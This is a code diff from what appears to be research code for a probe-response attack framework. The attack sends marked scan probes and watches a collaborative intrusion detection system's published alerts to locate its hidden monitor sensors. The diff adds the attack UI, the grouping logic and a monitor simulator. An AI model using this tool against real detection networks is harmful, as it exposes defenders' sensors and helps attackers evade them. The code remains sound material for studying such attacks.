+			#logger.debug("creating max %d subgroups" % group_freq[1])
+			# creating 500.000 times 256 subgroups (/24 + 8) takes ~6 Minutes
+			subgroups = group_freq[0].create_subgroups(
+				group_freq[1],
+				ipv4_addresses=feedback_addr,
+				use_plus1=self._use_plus1)
+			#logger.debug("subgroup amount for %r: %d" % (group_freq[0], len(subgroups)))
+
+			if self._use_plus1:
+				if not subgroups[-1].is_plus1:
+					logger.warning("????? +1 group missing!!!")
+				else:
+					#logger.debug("---> top/+1 group=%r\t%r" % (group_freq[0], subgroups[-1]))
+					plus1_cnt += 1
+			#logger.debug("first group to resplit is: %r" % subgroups[0])
+			subgroup_cnt += len(subgroups)
+
+			if len(subgroups) > group_freq[1]:
+				logger.warning("group created more subgroubs than it should: %d > %d" %
+							(len(subgroups), group_freq[1]))
+
+			if len(subgroups) == 1:
+				logger.warning("?????? just 1 subgroup? check this! This should have been an identified group, "
+								"parent/subgroup: %r" % subgroups)
+
+			"""
+			logger.debug("creating subgroups for group=%r: marker start/end = %d/%d" % (group_freq[0],
+																group_freq[0].subgroup_start_marker_value_int,
+																group_freq[0].subgroup_end_marker_value_int))
+			"""
+
+			for subgroup in subgroups:
+				if not subgroup.is_plus1:
+					marker_bytes_subgroup = self._create_marker_callback(markervalue_int)
+					subgroup.marker_value_int = markervalue_int
+					subgroup.marker_bytes = marker_bytes_subgroup
+					subgroup_storage[markervalue_int] = subgroup
+
+					#if markervalue_int % 100 == 0:
+					#	logger.debug("encoded marker value: %d -> %r" % (markervalue_int, marker_bytes_subgroup))
+
+					markervalue_int += 1
+					self._addresscount += subgroup.amount_addresses
+				else:
+					marker = b"PLUS1_SUBGROUP" + pack_4bytes(markervalue_int)
+					subgroup_storage[marker] = subgroup
+					group_freq[0].plus1_subgroup = subgroup
+					plus1_cnt_connected += 1
+				# top group is known to subgroup, top group gets subgroup to know on response
+				subgroup.top_group = group_freq[0]
+				# store group to be able to be found later on
+
+				if not subgroup.is_plus1:
+					while len(self._group_queue) >= self._group_queue_maxlen:
+						#logger.debug("group handler queue filled, waiting some seconds")
+						time.sleep(1)
+					self._group_queue.append(subgroup)
+
+		logger.debug("finished creating all groups, total=%d, +1 subgroups=%d, +1 subgroups connected=%d, top groups=%d" %
+					(subgroup_cnt, plus1_cnt, plus1_cnt_connected, len(groups_to_resplit)))
+
+		self._feedback_addresses.clear()
+		self._subgrouping_finished = True
+
+	@staticmethod
+	def _redistribute_marker_frequencies(marker_groupfreq):
+		"""
+		Redistribute marker to have min 2 vor every position.
+		Input: {a:1, b:999, c:0, ...}
+		Updated: {a:2, b:996, c:2 ...}
+
+		marker_groupfreq -- {marker : (group, amount_subgroups)}
+		return -- dict with min 1 at each position
+		"""
+		for index in marker_groupfreq.keys():
+			if marker_groupfreq[index][1] < 2:
+				# max_value({a:1, b:999, ...}) -> l=[(b, 999), (a, 1), ...] -> l[0][0]
+				max_index = sorted(marker_groupfreq.items(), key=lambda x: x[1][1], reverse=True)[0][0]
+
+				if marker_groupfreq[max_index][1] <= 2:
+					logger.warning("too low frequencies (1) for re-distributing, not enough marker values? (try more than 8)")
+					break
+
+				adding = 2 - marker_groupfreq[index][1]
+				marker_groupfreq[index][1] += adding
+				marker_groupfreq[max_index][1] -= adding
+
+	@staticmethod
+	def update_plus1_subgroups(top_groups):
+		"""
+		Derive amount of responses of subgroup "+1" using top group and beneath groups.
+		For iteration index > 1 there has to be a "+1"-group in any case. Top groups
+		which are already identified get discarded
+		Example:
+		Top-Group = [...] = 6 Responses
+		3 Sub-Groups = [2][1]["+1"-Group]  ...  [4 (group completely identified -> discard)]
+		Updated amount: [2][1][6- (2+1) = 3]
+
+		Behaviour on different response counts (implying +1):
+		Top < sum(Sub): Noise in sub or drop in top -> set +1 to 0
+		Top >= sum(Sub): Update +1 (can be Noise or drop after all but that should be filtered in the next iterations)
+
+		index_iteration -- index pointing to the groups BEFORE the most recent created groups.
+		"""
+		logger.debug("updating +1 groups")
+
+		for _, top_group in top_groups.items():
+			# +1 subgroup is None if Top group is an identified group, ignore
+			if top_group.plus1_subgroup is None:
+				continue
+
+			response_sum_subgroups = sum([group.response_count for group in top_group.subgroups])
+			"""
+			logger.debug("top group/responses top/reponses subgroups/top -> sub: plus 1 count: %r / %r / %r / %r" %
+				(top_group, top_group.response_count, response_sum_subgroups, top_group.plus1_subgroup.response_count))
+			"""
+			if response_sum_subgroups > top_group.response_count:
+				logger.warning("new response sum of subgroups greater than response count of top group"
+								"-> assuming noise in new responses OR packet drops in old, setting '+1'-group to 0")
+				# TODO: activate if needed (deactivated to save memory)
+				#top_group.response_discrepancy = top_group.response_count - response_sum_subgroups
+				top_group.plus1_subgroup.response_count = 0
+			else:
+				top_group.plus1_subgroup.response_count = top_group.response_count - response_sum_subgroups
+				#if top_group.plus1_subgroup.response_count != 0:
+				#	logger.debug("found a subgroup having response: %r=%d" % (top_group.plus1_subgroup, top_group.plus1_subgroup.response_count))
+
+	@staticmethod
+	def remove_empty_groups(subgroups):
+		"""
+		Remove all groups having response count of 0.
+		This has to be called AFTER update +1 groups or non empty +1 groups could
+		be removed by mistake otherwise.
+		"""
+		# we can't change a dict while traversing! store keys to be deleted
+		keys_to_remove = [markervalue for markervalue, subgroup in subgroups.items()
+						if subgroup.response_count == 0]
+		for key in keys_to_remove:
+			del subgroups[key]
+		logger.debug("removed empty groups=%d, remaining groups=%d" % (len(keys_to_remove), len(subgroups)))

+ 112 - 0
attack_framework/ipv4.py

@@ -0,0 +1,112 @@
+"""
+This is a highly performance optimized ipaddress like module.
+Subnet creating is approximatelly 50 times faster.
+"""
+from utility import int_to_ip_str, ip_str_to_int
+import logging
+import struct
+import re
+
+split_slash = re.compile("/").split
+
+unpack_ipv4address = struct.Struct(">I").unpack
+pack_ipv4address = struct.Struct(">I").pack
+
+logging.basicConfig(format="%(levelname)s (%(funcName)s): %(message)s")
+logger = logging.getLogger("pra_framework")
+logger.setLevel(logging.DEBUG)
+
+
+class IPv4Address(object):
+	def __init__(self, ip_int=None, ip_bytes=None, ip_str=None):
+		if ip_int is not None:
+			self._ip_int = ip_int
+		elif ip_bytes is not None:
+			self._ip_int = unpack_ipv4address(ip_bytes)[0]
+		elif ip_str is not None:
+			self._ip_int = ip_str_to_int(ip_str)
+
+	packed = property(lambda self: pack_ipv4address(self._ip_int))
+	compressed = property(lambda self: int_to_ip_str(self._ip_int))
+	ip_int = property(lambda self: self._ip_int)
+
+	def __repr__(self):
+		return self.compressed
+
+
+class IPv4Network(object):
+	def __init__(self, nw_ip_int=None, nw_ip_bytes=None, nw_ip_str=None, nw_ip_str_prefix=None, prefixlen=32):
+		if nw_ip_int is not None:
+			self._nw_ip_int = nw_ip_int
+		elif nw_ip_bytes is not None:
+			self._nw_ip_int = unpack_ipv4address(nw_ip_bytes)[0]
+		elif nw_ip_str is not None:
+			self._nw_ip_int = ip_str_to_int(nw_ip_str)
+		elif nw_ip_str_prefix is not None:
+			ip, prefix = split_slash(nw_ip_str_prefix)
+			prefixlen = int(prefix)
+			self._nw_ip_int = ip_str_to_int(ip)
+		self._prefixlen = prefixlen
+
+	prefixlen = property(lambda self: self._prefixlen)
+	ip_int = property(lambda self: self._nw_ip_int)
+
+	def subnets(self, prefixlen_diff):
+		if (self._nw_ip_int << (self._prefixlen + prefixlen_diff) & 0xFFFFFFFF) != 0:
+			raise Exception("Host bits are not empty: %d" %
+							((self._nw_ip_int << (self._prefixlen + prefixlen_diff)) & 0xFFFFFFFF))
+
+		prefixlen_new = self._prefixlen + prefixlen_diff
+
+		if prefixlen_new > 32:
+			raise Exception("32 CIDR bits reached")
+
+		#logger.debug("new subnets: %d, new prefix: %d" % (2**prefixlen_diff, prefixlen_new))
+		nw_add = 2 ** (32 - prefixlen_new)
+		#logger.debug("host bits: %d" % (32 - prefixlen_new))
+		nw_int = self._nw_ip_int
+		return [IPv4Network(nw_ip_int=nw_int + nw_add * x, prefixlen=prefixlen_new) for x in range(2 ** prefixlen_diff)]
+
+	def _get_num_addresses(self):
+		try:
+			return self._host_addresses
+		except AttributeError:
+			host_addresses = 2 ** (32 - self._prefixlen)
+			self._host_addresses = host_addresses
+			return host_addresses
+
+	num_addresses = property(_get_num_addresses)
+
+	def _get_hosts(self):
+		try:
+			host_addresses = self._host_addresses
+		except AttributeError:
+			host_addresses = 2 ** (32 - self._prefixlen)
+			self._host_addresses = host_addresses
+
+		return [pack_ipv4address(ip) for ip in range(self._nw_ip_int, self._nw_ip_int + host_addresses)]
+	# get hosts as packed bytes (including netowrk and broadcast address
+	hosts = property(_get_hosts)
+
+	def __repr__(self):
+		return self.compressed
+
+	def __contains__(self, other):
+		"""
+		other --  IPv4Address object
+		return -- True if other is contained in this network, False otherwise
+		"""
+		#logger.debug("checking: %r <-> %r" % (self, other))
+		try:
+			host_addresses = self._host_addresses
+		except AttributeError:
+			host_addresses = 2 ** (32 - self._prefixlen)
+			self._host_addresses = host_addresses
+		try:
+			#logger.debug("%d <= %d < %d" % (self._nw_ip_int, other._ip_int, (self._nw_ip_int + host_addresses)))
+			return self._nw_ip_int <= other._ip_int < (self._nw_ip_int + host_addresses)
+		except AttributeError:
+			# only works on IPv4Address
+			return False
+
+	compressed = property(lambda self: int_to_ip_str(self._nw_ip_int) + "/%d" % self._prefixlen)

+ 206 - 0
attack_framework/main_attack.py

@@ -0,0 +1,206 @@
+"""
+This module starts the probe response attack UI.
+Use --help to show possible parameters
+"""
+import cmd
+import sys
+import argparse
+import logging
+import os
+import inspect
+import netifaces
+import time
+from report_fetcher import ReportFetcher
+from attack_logic import ProbeResponseAttackLogic
+
+# Logging config
+logging.basicConfig(format="%(levelname)s (%(funcName)s): %(message)s")
+logger = logging.getLogger("pra_framework")
+logger.setLevel(logging.DEBUG)
+
+# TODO: change for testing
+dirname_save = time.strftime("attack_%Y_%m_%d__%H_%M_%S") + "/"
+#dirname_save = "output_dir_testing" + "/"
+
+if not os.path.exists(dirname_save):
+	logging.debug("creating new directory to save results: %s" % dirname_save)
+	try:
+		os.mkdir(dirname_save)
+	except Exception as ex:
+		print(ex)
+# Log to file, logging to console is already enabled
+fileHandler = logging.FileHandler(dirname_save + "/framework.log")
+logFormatter = logging.Formatter("%(asctime)s %(levelname)s (%(funcName)s): %(message)s",
+								datefmt="%d/%m/%Y %I:%M:%S")
+fileHandler.setFormatter(logFormatter)
+logger.addHandler(fileHandler)
+
+
+class AttackUI(cmd.Cmd):
+	"""
+	Command line UI to control the attack framework.
+	"""
+	intro = "\n################################################\n#Welcome to the Probe Response attack framework#\n" \
+			"################################################\nType 'help' for available commands. Use tab for auto-completion."
+	promt = ">"
+	file = None
+
+	def __init__(self, args):
+		super().__init__()
+		try:
+			mac_iface = netifaces.ifaddresses(args.interface)[17][0]["addr"]
+			ip_for_iface = netifaces.ifaddresses(args.interface)[2][0]["addr"]
+
+			self.attacklogic = ProbeResponseAttackLogic(interface_name=args.interface,
+													ip_src=ip_for_iface,
+													mac_source=mac_iface,
+													mac_gw=args.macgw,
+													rate_kbit_per_s=args.rate,
+													marker_encoding=args.encoding,
+													markerbits_value=args.markervaluebits,
+													markerbits_checksum=args.checksumbits,
+													rate=args.rate,
+													base_dir_save=dirname_save,
+													base_dir_zmap="../zmap",
+													report_fetcher_classname=args.reportfetcherclass,
+													use_feedback_ips=args.usefeedbackips,
+													use_plus1=args.useplus1,
+													is_simulation=True,
+													_ip_stage1="0.0.0.0",
+													_cidr_bits_stage1=0
+													)
+		except Exception as ex:
+			print(ex)
+
+	def do_start(self, arg):
+		"""
+		Start the probe response attack
+		"""
+		logging.info("starting attack")
+		try:
+			self.attacklogic.start()
+		except Exception as ex:
+			print(ex)
+
+	def do_stop(self, arg):
+		"""
+		Stop the probe response attack
+		"""
+		logging.info("stopping attack")
+		self.attacklogic.stop()
+
+	def do_setreportfetcher(self, arg):
+		"""
+		Set a new reportfetcher to fetch report events of the attacked CIDS.
+		"""
+		fetcher_module = __import__("report_fetcher")
+
+		def check(clz):
+			return inspect.isclass(clz) and issubclass(clz, ReportFetcher) and clz != ReportFetcher
+
+		classes = inspect.getmembers(sys.modules["report_fetcher"], check)
+		print("available classes (chose 0-%d):" % (len(classes) - 1))
+
+		for cnt, clz in enumerate(classes):
+			print("%d: %s" % (cnt, clz[1].__name__))
+		try:
+			index = int(input("\nNew report fetcher class: "))
+			self.attacklogic.set_report_fetcher_class(classes[index][0])
+		except:
+			print("did not understand, won't chang anything")
+
+	def do_setrate(self, arg):
+		"""
+		Change the probe rate of the scanner (Kbit/s)
+		"""
+		try:
+			rate = int(input("\nNew attack rate (current: %d):" % self.attacklogic.rate_kbit_per_s))
+			self.attacklogic.rate_kbit_per_s = rate
+		except:
+			print("did not understand, won't chang anything")
+
+	def do_setverbosity(self, arg):
+		"""
+		Change the frameworks log verbosity (0=WARNING, 1=INFO, 2=DEBUG)
+		"""
+		try:
+			level = int(input("\nNew log level 0-2:"))
+			levels = [logging.WARNING, logging.INFO, logging.DEBUG]
+			logger.setLevel(levels[level])
+		except:
+			print("did not understand, won't change anything")
+
+	def do_stats(self, arg):
+		"""
+		Show basic statistics about the attack.
+		"""
+		logging.info("Showing statistics:")
+		logger.info("Attack durations, groups, addresses (1st = root, last = identified):")
+		seconds_total = 0
+		identified_group_index = 0
+
+		try:
+			for groupstore in self.attacklogic._iterations:
+				start = groupstore[0][0]
+				end = groupstore[0][1]
+				diff = 0 if end == 0 else (end - start)
+				seconds_total += diff
+				groups = groupstore[2]
+				addresses = groupstore[3]
+				identified_groups = 0
+				identified_addr = 0
+
+				if identified_group_index > 0:
+					try:
+						# group store 2 (iteration) = group handler iteration 1
+						identified_groups = sum([1 for gti in self.attacklogic._grouphandler.identified_groups
+											if gti[2] == identified_group_index])
+						identified_addr = sum([gti[0].amount_addresses for gti in self.attacklogic._grouphandler.identified_groups
+											if gti[2] == identified_group_index])
+					except:
+						pass
+				identified_group_index += 1
+				logger.info("%d -> %d (diff: %d), groups: %d, addresses: %d, identified g: %d, identified a: %d" %
+							(start, end, diff, groups, addresses, identified_groups, identified_addr))
+
+			logger.info("seconds total: %d" % seconds_total)
+			logger.info("probes total: [first iteration] + %d" % self.attacklogic.get_amount_of_probes())
+			logger.info("identified groups: %d" % len(self.attacklogic._grouphandler.identified_groups))
+			logger.info("identified addresses: %d" % sum([gti[0].amount_addresses for gti in self.attacklogic._grouphandler.identified_groups]))
+		except Exception as ex:
+			logger.warning("try again on less activity")
+			logger.warning(ex)
+
+	def do_quit(self, arg):
+		"""
+		Shutdown the attack framework.
+		"""
+		sys.exit(0)
+
+if __name__ == "__main__":
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-i", "--interface", help="Interface to send on packets",
+						required=True)
+	parser.add_argument("-m", "--macgw", help="MAC address of gateway",
+						required=True)
+	parser.add_argument("-r", "--rate", type=int, help="Rate used to send packets (Kbit/s)",
+						default=1000)
+	parser.add_argument("-e", "--encoding", type=int, help="Encoding to be used. Single or bit-OR combination (1=dst port,"
+						"2=src IP, 4=src port)",
+						default=5)
+	# WARNING: setting marker values too low will make the attack impossible
+	parser.add_argument("-b", "--markervaluebits", type=int, help="Amount of bits to be used for markervalue",
+						default=28)
+	parser.add_argument("-c", "--checksumbits", type=int, help="Amount of bits to be used for checksum",
+						default=4)
+	parser.add_argument("-f", "--reportfetcherclass", help="Name of report fetcher to be used"
+														" (class name contained in report_fetcher.py)",
+						default="TracingReportFetcher")
+	parser.add_argument("-l", "--useplus1", type=bool, help="Use +1 groups",
+						default=False)
+	parser.add_argument("-g", "--usefeedbackips", type=bool, help="Use scanner feedback for group clustering",
+						default=False)
+
+	args = parser.parse_args()
+
+	AttackUI(args).cmdloop()

+ 570 - 0
attack_framework/main_monitor_simulator.py

@@ -0,0 +1,570 @@
+import os
+import logging
+import argparse
+import time
+import socket
+import random
+import requests
+import json
+import struct
+import multiprocessing
+from multiprocessing import Process, Queue
+import re
+from ipv4 import IPv4Address, IPv4Network
+import numpy as np
+
+from pypacker import psocket
+from pypacker import ppcap
+from pypacker.layer12.ethernet import Ethernet
+from pypacker.layer3 import ip
+from pypacker.layer4 import tcp
+
+logging.basicConfig(format="%(levelname)s (%(funcName)s): %(message)s")
+logger = logging.getLogger("pra_framework")
+logger.setLevel(logging.DEBUG)
+
+CURRENT_DIR	= os.path.dirname(os.path.realpath(__file__))
+FILE_NODES	= CURRENT_DIR + "/simulated_nodes.txt"
+
+RESPONSETYPE_NONE		= 0
+RESPONSETYPE_TCP_RST	= 1
+RESPONSETYPE_TCP_SYNACK	= 2
+RESPONSETYPE_ICMP		= 4
+RESPONSETYPES_TCP		= {RESPONSETYPE_TCP_RST, RESPONSETYPE_TCP_SYNACK}
+
+RESPONSE_TYPES_DESCR = {RESPONSETYPE_NONE: "NONE",
+						RESPONSETYPE_TCP_RST: "RST",
+						RESPONSETYPE_TCP_SYNACK: "SYNACK",
+						RESPONSETYPE_ICMP: "ICMP"}
+
+packipv4 = struct.Struct(">I").pack
+split_tab = re.compile("\t").split
+
+#cert = ("ssl/simulator/simulator_cert.pem", "ssl/simulator/simulator_key.pem")
+requests.packages.urllib3.disable_warnings()
+
+
+def store_packets(packets, filename="exception_packets.pcap"):
+	writer = ppcap.Writer(filename=filename)
+	for bts in packets:
+		writer.write(bts)
+	writer.close()
+
+
+class MonitorSimulator(object):
+	"""
+	Simulates monitor nodes on a host system which in turn send attack information to a central CIDS.
+	The simulation can be done using a virtual interface:
+	modprobe dummy (optional if already loaded)
+	ip link set name eth10 dev dummy0
+	ip link show eth10
+	ifconfig eth10 txqueuelen 10000
+
+	Optimazation of /etc/sysctl.conf should be done.
+	"""
+	def __init__(self,
+				# total amount of monitors (monitor_ips + random generated)
+				amount_monitors=10000,
+				cidr_bits=0,
+				# total amount of addresses which give scanner feedback
+				amount_non_monitors=10000,
+				# monitor IP addresses as ["1.2.3.4", ...]
+				monitor_ips=[],
+				seed=123456789,
+				url_tracing="https://localhost:443",
+				interface_name="lo",
+				buffer_size=500000,
+				cluster_monitors=False,
+				# probability that a monitor returns a relevant scanner feedback (RST, SYN/ACK)
+				prop_mon_scannerfeedback=0.8,
+				prop_nwdrop=0.0,
+				file_blacklist=None):
+		logger.debug("monitors=%d, non monitors=%d, scanner feedback=%f, nw drop=%f, cluster=%d" % (amount_monitors,
+																						amount_non_monitors,
+																						prop_mon_scannerfeedback,
+																						prop_nwdrop,
+																						cluster_monitors))
+		self._amount_monitors = amount_monitors
+		self._amount_non_monitors = amount_non_monitors
+		self._prop_mon_scannerfeedback = prop_mon_scannerfeedback
+		self._cluster_monitors = cluster_monitors
+		self._prop_nwdrop = prop_nwdrop
+		self._blacklist_nw_objs = []
+		self._blacklist_int_sub8 = set()
+
+		if file_blacklist is not None:
+			self._blacklist_nw_objs, self._blacklist_int_sub8 = self.read_blacklist(file_blacklist)
+
+		self._rand = random.Random()
+		self._rand.seed(a=seed, version=1)
+		self._rand_nwloss = random.Random()
+		self._rand_nwloss.seed(a=seed, version=1)
+
+		logger.debug("TraCINg url=%s, interface=%s" % (url_tracing, interface_name))
+		logger.debug("Initiating Queue, size: %d" % buffer_size)
+		self._queue = Queue(maxsize=buffer_size)
+		# Group response probabilities
+		self._responsetypes = [
+					RESPONSETYPE_NONE,
+					RESPONSETYPE_TCP_RST,
+					RESPONSETYPE_TCP_SYNACK,
+					RESPONSETYPE_ICMP]
+		self._file_identified_monitors = "./output_dir_testing/identified_monitors.csv"
+		self._listening_ips = {}
+		# TODO: adjust this for different subnets
+		# this has to match _cidr_bits_stage1 in main_attack.py
+		# /0
+		self._host_addresses_mask = 0xFFFFFFFF
+		self._host_addresses_mask >>= cidr_bits
+		logger.debug("Max host IP addresses (host mask): %X" % self._host_addresses_mask)
+		self._initiate_listening_ips(monitor_ips)
+
+		logger.debug("total amount of listening addresses=%d (w/ + w/o feedback)" % len(self._listening_ips))
+		self._sockets_read = []
+		self._sockets_write = []
+		self._is_running = False
+		# TODO: adjust this on other platforms
+		self._read_processes_amount = 2
+		self._read_processes = []
+		socket_read = psocket.SocketHndl(iface_name=interface_name,
+								timeout=10,
+								buffersize_recv=2 ** 29)
+		self._sockets_read.append(socket_read)
+		logger.debug("creating %d processes for reading packets" % self._read_processes_amount)
+
+		for cnt in range(self._read_processes_amount):
+			proc = Process(target=self._packet_collect_cycler, args=(cnt + 1,
+																socket_read,
+																self._queue,
+																self._listening_ips))
+			self._read_processes.append(proc)
+
+		requests_session = requests.Session()
+		#adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
+		#requests_session.mount('https://', adapter)
+
+		self._attack_reaction_processes = []
+		# TODO: adjust this on other platforms
+		self._attack_reaction_processes_amount = 5
+
+		logger.debug("creating %d processes for attack reaction" % self._attack_reaction_processes_amount)
+
+		for cnt in range(self._attack_reaction_processes_amount):
+			socket_write = psocket.SocketHndl(iface_name=interface_name,
+								timeout=60 * 60 * 24 * 7,
+								#buffersize_send=2 ** 23)
+								buffersize_send=2 ** 29)
+			self._sockets_write.append(socket_write)
+
+			attack_reaction_process = Process(
+							target=self._attack_reaction_cycler,
+							args=(cnt + 1,
+								socket_write,
+								self._queue,
+								requests_session,
+								url_tracing,
+								self._listening_ips))
+			self._attack_reaction_processes.append(attack_reaction_process)
+
+	def start(self):
+		if self._is_running:
+			return
+		logger.debug("starting collection and reaction logic")
+		self._is_running = True
+
+		for process in self._attack_reaction_processes:
+			process.start()
+
+		time.sleep(2)
+
+		for proc in self._read_processes:
+			proc.start()
+
+	def stop(self):
+		if not self._is_running:
+			return
+		self._is_running = False
+		for sock in self._sockets_read + self._sockets_write:
+			sock.close()
+		self._queue.close()
+
+		for proc in self._read_processes:
+			# don't wait for process to finish, just terminate
+			proc.terminate()
+		for proc in self._attack_reaction_processes:
+			# don't wait for process to finish, just terminate
+			proc.terminate()
+
+	def _initiate_listening_ips(self, monitor_ips):
+		"""
+		Initiate IP addresses which trigger alerts and/or give scanner feedback.
+
+		monitor_ips -- monitor IPs to be added as "a.b.c.d"
+		"""
+		# apply reaction on custom defined monitors
+		if len(monitor_ips) > 0:
+			logger.debug("listening IP addresses were given explicitly, adding %d" % len(monitor_ips))
+
+			for ip in monitor_ips:
+				self._listening_ips[IPv4Address(ip_str=ip).packed] = [RESPONSETYPE_TCP_RST, True]
+
+		if not self._cluster_monitors:
+			#logger.info("creating %d random IPs" % self._amount_monitors)
+			self._create_random_ips(self._amount_monitors, is_monitor_ip=True)
+		else:
+			#logger.info("creating %d random clustered IPs" % self._amount_monitors)
+			#self._create_clustered_monitors(self._amount_monitors)
+			self._create_clustered_monitors_distr(self._amount_monitors)
+
+		logger.debug("total amount of monitors=%d" % len(self._listening_ips))
+
+		if self._amount_non_monitors > 0:
+			# target = current amount + non_monitor_ips * probability_nonmonitor
+			target_amount = len(self._listening_ips) + self._amount_non_monitors
+
+			logger.info("creating %d non monitor feedback IPs" % self._amount_non_monitors)
+
+			if target_amount > self._host_addresses_mask:
+				raise Exception("!!!! too many addresses to create! %d >= %d" % (target_amount, self._host_addresses_mask))
+			self._create_random_ips(target_amount, is_monitor_ip=False)
+
+		amount_mon = sum([1 for _, resp_mon in self._listening_ips.items() if resp_mon[1]])
+		amount_nonmon = sum([1 for _, resp_mon in self._listening_ips.items() if not resp_mon[1]])
+		logger.info("sanity check: monitors=%d, non monitors=%d" % (amount_mon, amount_nonmon))
+		self._set_feedback_types()
+
+	def check_matches(self):
+		"""
+		Check if every match in ./output_dir_testing/identified_monitors.csv is
+		really a monitor.
+		"""
+		fd = open(self._file_identified_monitors, "r")
+		monitor_found = 0
+		monitor_false_positive_no_monitor = 0
+		monitor_false_positive_unknown = 0
+		# skip header
+		fd.readline()
+		all_ips = set()
+
+		for line in fd:
+			ip_str = split_tab(line)[0]
+			try:
+				ips = IPv4Network(nw_ip_str_prefix=ip_str).hosts if "/" in line else [IPv4Address(ip_str=ip_str).packed]
+			except TypeError:
+				continue
+			except Exception as ex:
+				logger.warning("something went wrong while checking IP address=%r" % ip_str)
+				print(ex)
+				break
+
+			for ip_bytes in ips:
+				if ip_bytes in all_ips:
+					logger.warning("allready counted, duplicate? from file=%s, converted=%r" %
+									(ip_str, IPv4Address(ip_bytes=ip_bytes)))
+				all_ips.add(ip_bytes)
+				try:
+					assert self._listening_ips[ip_bytes][1] is True
+					monitor_found += 1
+				except KeyError:
+					monitor_false_positive_unknown += 1
+
+					if monitor_false_positive_unknown % 100 == 0:
+						logger.debug("%d: unknown to simulator: %r" % (monitor_false_positive_unknown,
+																	IPv4Address(ip_bytes=ip_bytes)))
+				except AssertionError:
+					monitor_false_positive_no_monitor += 1
+					logger.debug("known to simulator but not a monitor: %r" % IPv4Address(ip_bytes=ip_bytes))
+		logger.info("correctly identified monitors: %d" % monitor_found)
+		logger.info("unknown to simulator (false positive): %d" % monitor_false_positive_unknown)
+		logger.info("found but not monitor (false positive): %d" % monitor_false_positive_no_monitor)
+
+		fd.close()
+
+	def _set_feedback_types(self):
+		"""
+		Set the type of feedback given on scanner level.
+		"""
+		logger.debug("setting feedback types")
+		randrange = self._rand.randrange
+		rand_0_1 = self._rand.random
+
+		for key, _ in self._listening_ips.items():
+			#logger.debug(ip_bytes)
+			# non monitor = give feedback in any case, monitor = feedback based on probability
+			feedback_prop = self._prop_mon_scannerfeedback if self._listening_ips[key][1] else 1.0
+			is_feedback = rand_0_1() <= feedback_prop
+
+			# feedback: RST or SYN/ACK
+			self._listening_ips[key][0] = self._responsetypes[randrange(1, 3)] if is_feedback else RESPONSETYPE_NONE
+
+	@staticmethod
+	def read_blacklist(filename):
+		"""
+		return -- list of blacklisted IP network objects
+		"""
+		logger.debug("Reading blacklist from: %s" % filename)
+		addresses_nw_obj = []
+		addresses_int_sub8 = set()
+		total_addresses = 0
+		fd = open(filename, "r")
+
+		for line in fd:
+			try:
+				if line[0] == "#":
+					continue
+				nw = IPv4Network(nw_ip_str_prefix=line)
+				total_addresses += nw.num_addresses
+				addresses_nw_obj.append(nw)
+				addresses_int_sub8.add(nw.ip_int >> 24)
+			except:
+				pass
+
+		fd.close()
+		logger.debug("Blacklist address groups=%d, addresses=%d, sub8=%d" %
+					(len(addresses_nw_obj), total_addresses, len(addresses_int_sub8)))
+		return addresses_nw_obj, addresses_int_sub8
+
+	def _create_random_ips(self, target_amount, is_monitor_ip=True):
+		"""
+		Create random even distributed IP addresses.
+		target_amount -- Add addresses until this size is reached
+		is_monitor_ip -- Add addresses of type monitor if True, add non monitor otherwise
+		"""
+		logger.debug("creating %d random IP addresses, monitor=%r" % (target_amount, is_monitor_ip))
+		randrange = self._rand.randrange
+		rand_0_1 = self._rand.random
+		#feedback_prop = self._prop_mon_scannerfeedback if is_monitor_ip else 1.0
+		cnt = 0
+
+		while len(self._listening_ips) < target_amount:
+			cnt += 1
+			ip_num = randrange(0, self._host_addresses_mask)
+			ip_bytes = packipv4(ip_num)
+
+			# don't overwrite old values
+			#if ip_bytes in self._listening_ips:
+			#	continue
+
+			if (ip_num >> 24) in self._blacklist_int_sub8:
+				#logger.debug("checking: %r" % ip_bytes)
+				for ip_nw in self._blacklist_nw_objs:
+					if ip_num & ip_nw.ip_int == ip_nw.ip_int:
+						#logger.debug("skipping: %r" % ip_nw)
+						continue
+
+			#logger.debug(ip_bytes)
+			# feedback: RST or SYN/ACK
+			#print(ip_bytes)
+			self._listening_ips[ip_bytes] = [None, is_monitor_ip]
+
+	def _create_clustered_monitors(self, target_amount):
+		"""
+		Create clustered IP addresses by generating sequential addresses using
+		pareto and exponential distributions.
+
+		target_amount -- target amount of IP addresses for _listening_ips
+		"""
+		logger.info("creating %d random clustered IPs" % self._amount_monitors)
+		# classical pareto by "scale=m=1"
+		#s = np.random.pareto(a, 10000) + m
+		# shape = a = 1.x, scale = 1 (not adjusted), location = 1 (min value 1)
+		# mean = sum/length = shape * scale / (shape - 1)
+		# -> a=2.1: mean=~1.9
+		# -> a=1.1: mean=~10
+		# -> a=1.01: mean=~100
+		pareto = np.random.pareto
+		pareto_shape = 1.01
+		exponential = np.random.exponential
+		# mean=scale
+		exponential_scale = 200
+		current_ip = 0
+		ip_max = self._host_addresses_mask - 10000
+
+		if ip_max < 0:
+			logger.warning("address range too small: %d<%d, will not create any monitors" %
+							(self._host_addresses_mask, 10000))
+			return
+
+		while len(self._listening_ips) < target_amount and current_ip < ip_max:
+			sequential_add = int(pareto(pareto_shape) + 1)
+			logger.debug(sequential_add)
+			for ip in range(current_ip, current_ip + sequential_add):
+				ip_bytes = packipv4(ip)
+				self._listening_ips[ip_bytes] = [None, True]
+			current_ip += sequential_add + int(exponential(scale=exponential_scale))
+
+		if len(self._listening_ips) < target_amount:
+			logger.warning("could not create enough monitors (to small range?) %d < %d" %
+							(len(self._listening_ips), target_amount))
+
+	def _packet_collect_cycler(self, procnum, sockethndl, queue, ip_whitelist):
+		"""
+		Collects packets and puts them into the Queue if the destination IP address
+		matches an address in ip_whitelist.
+
+		sockethndl -- A SocketHandler to read bytes from
+		queue -- A queue to write bytes to if an destination IP addres matches
+		ip_whitelist -- A dictionary posing a whitelist
+		"""
+		logger.debug("starting listening process Nr. %d" % procnum)
+
+		psock_recv = sockethndl._socket_recv.recv
+		queue_put = queue.put
+		cnt = 0
+		last_cnt = 0
+
+		while True:
+			try:
+				bts = psock_recv(64)
+				cnt += 1
+				# logger.debug("...")
+				# time.sleep(1)
+				if not bts[14 + 16: 14 + 16 + 4] in ip_whitelist:
+					continue
+				#logger.debug("!!!!!!! got a packet")
+				queue_put(bts)
+			except socket.timeout:
+				# logger.debug("read timeout..")
+				if last_cnt != cnt:
+					logger.debug("collector %d: amount of probes to NW=%d" % (procnum, cnt))
+					last_cnt = cnt
+				#continue
+
